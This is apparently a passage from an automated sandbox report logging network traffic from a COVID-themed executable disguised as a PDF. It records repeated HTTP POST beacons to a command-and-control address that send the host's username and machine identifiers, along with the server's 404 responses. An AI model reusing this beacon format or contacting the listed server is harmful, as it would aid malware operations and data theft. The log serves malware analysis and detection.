6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                        Jul 1, 2021 14:36:33.568468094 CEST1370INData Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                                        Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                                        Jul 1, 2021 14:36:33.568520069 CEST1371INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                                        Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                        Jul 1, 2021 14:36:33.568566084 CEST1372INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                                        Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                                        Jul 1, 2021 14:36:33.568645954 CEST1374INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                                        Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                                        Jul 1, 2021 14:36:33.568691969 CEST1375INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                                        Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                                        Jul 1, 2021 14:36:33.568737030 CEST1377INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                                        Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                                        Jul 1, 2021 14:36:33.568780899 CEST1378INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                                        Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.34971963.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:33.952661037 CEST1383OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 163
                                        Connection: close
                                        Jul 1, 2021 14:36:34.113523006 CEST1386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                        Data Ascii: (ckav.ruhardz841675DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                        Jul 1, 2021 14:36:34.788209915 CEST1393INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:34 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                        Jul 1, 2021 14:36:34.788239002 CEST1394INData Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                                        Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                                        Jul 1, 2021 14:36:34.788250923 CEST1396INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                                        Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                        Jul 1, 2021 14:36:34.788266897 CEST1397INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                                        Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                                        Jul 1, 2021 14:36:34.788281918 CEST1398INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                                        Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                                        Jul 1, 2021 14:36:34.788295984 CEST1400INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                                        Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                                        Jul 1, 2021 14:36:34.788311005 CEST1401INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                                        Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                                        Jul 1, 2021 14:36:34.788325071 CEST1402INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                                        Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.34972063.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:35.267014027 CEST1403OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 163
                                        Connection: close
                                        Jul 1, 2021 14:36:35.425919056 CEST1403OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                        Data Ascii: (ckav.ruhardz841675DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                        Jul 1, 2021 14:36:36.150140047 CEST1404INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:35 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                        Jul 1, 2021 14:36:36.151612997 CEST1406INData Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                                        Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
